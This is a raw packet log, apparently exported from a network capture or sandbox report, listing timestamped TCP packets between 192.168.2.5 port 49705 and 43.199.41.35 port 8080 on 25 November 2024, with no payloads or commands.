                                                                                                                                                        Nov 25, 2024 11:10:20.252852917 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.271778107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.271842003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.271997929 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.272176981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.272416115 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.272463083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.273086071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.273256063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.273300886 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.273956060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.274158001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.274229050 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.274849892 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.274943113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.274986029 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.275744915 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.275881052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.275926113 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.276715994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.276730061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.276863098 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.277493000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.277597904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.277641058 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.278414011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.278481007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.278525114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.279325962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.279396057 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.279437065 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.280164003 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.280273914 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.280313969 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.281035900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.281117916 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.281157970 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.282027960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.282080889 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.282135010 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.282865047 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.282902956 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.282943964 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.283693075 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.283771992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.283983946 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.284631014 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.284723997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.284774065 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.285517931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.285593033 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.285638094 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.286410093 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.286533117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.286581039 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.287281036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.287305117 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.287353992 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.288266897 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.288306952 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.288350105 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.289026022 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.289124966 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.289172888 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.289916992 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.289999962 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.290045023 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.290817976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.290913105 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.290961027 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.291701078 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.291805983 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.291944981 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.292653084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.292692900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.292737961 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.293437004 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.293559074 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.293600082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.294352055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.294434071 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.294476986 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.295238018 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.295348883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.295391083 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.296091080 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.296278954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.296319962 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.297008038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.297118902 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.297158003 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.297909021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.298043013 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.298084021 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.298809052 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.298943043 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.298983097 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.299654007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.299745083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.300009966 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.300592899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.300692081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.300746918 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.301455021 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.301580906 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.301779032 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.302371025 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.302467108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.302520990 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.303247929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.323122025 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.413912058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.413928032 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.413975000 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.414298058 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.414388895 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.414434910 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.414994001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.415155888 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.415213108 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.415823936 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.416004896 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.416040897 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.416809082 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.416824102 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.416860104 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.417783976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.417907000 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.417946100 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.418560982 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.418615103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.418656111 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.444386005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.444402933 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.444466114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.444879055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.444910049 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.444950104 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.445605040 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.445980072 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.446022987 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.446074009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.447149038 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.447189093 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.447217941 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.448080063 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.448095083 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.448117971 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.448817968 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.448858976 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.448877096 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.449511051 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.449553013 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.449572086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.450385094 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.450428009 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.450459957 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.451370001 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.451414108 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.451463938 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.452209949 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.452220917 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.452250004 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.464184046 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.464236975 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.464266062 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.464988947 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.465033054 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.466438055 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.468417883 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.468431950 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.468444109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.468456984 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.468466043 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.468470097 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.468489885 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.468530893 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.468569994 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.469222069 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.469264030 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.469547033 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.470366955 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.470379114 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.470419884 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.471129894 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.471167088 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.471309900 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.471927881 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.471966982 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.472141027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.472856045 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.472893953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.473004103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.473680019 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.473717928 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.473856926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.474644899 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.474692106 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.474788904 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.475461960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.475498915 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.475780964 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.476895094 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.476933002 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.477400064 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.477417946 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.477447987 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.477555037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.478210926 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.478251934 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.478341103 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.479269981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.479309082 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.479417086 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.479897976 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.479934931 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.480046988 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.480853081 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.480890036 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.480998993 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.481645107 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.481684923 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.481843948 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.482578039 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.482637882 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.482723951 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.483506918 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.483550072 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.483647108 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.484455109 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.484493017 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.484638929 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.485378981 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.485395908 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.485418081 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.486191034 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.486229897 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.486346960 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.486977100 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.487013102 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.487194061 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.488055944 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.488074064 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.488096952 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.488879919 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.488919020 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.489028931 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.489725113 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.489769936 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.489880085 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.490665913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.490677118 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.490711927 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.491616011 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.491635084 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.491660118 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.492376089 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.492415905 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.492563963 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.493329048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.493367910 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.493498087 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.494244099 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.494287014 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.494396925 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.495035887 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.495073080 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.495182037 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.495906115 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.495944023 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.496043921 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.496243954 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.496282101 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.607470036 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.607573986 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.607633114 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.607860088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.608186007 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.608231068 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.608787060 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.608799934 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.608831882 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.609556913 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.609730005 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.609774113 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.610512972 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.610671997 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.610714912 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.611460924 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.611479044 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.611516953 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.612389088 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.612401009 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.612447977 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.638199091 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.638319016 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.638370991 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.638468027 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.638736010 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.638775110 CET497058080192.168.2.543.199.41.35
                                                                                                                                                        Nov 25, 2024 11:10:20.639502048 CET80804970543.199.41.35192.168.2.5
                                                                                                                                                        Nov 25, 2024 11:10:20.639672995 CET80804970543.199.41.35192.168.2.5
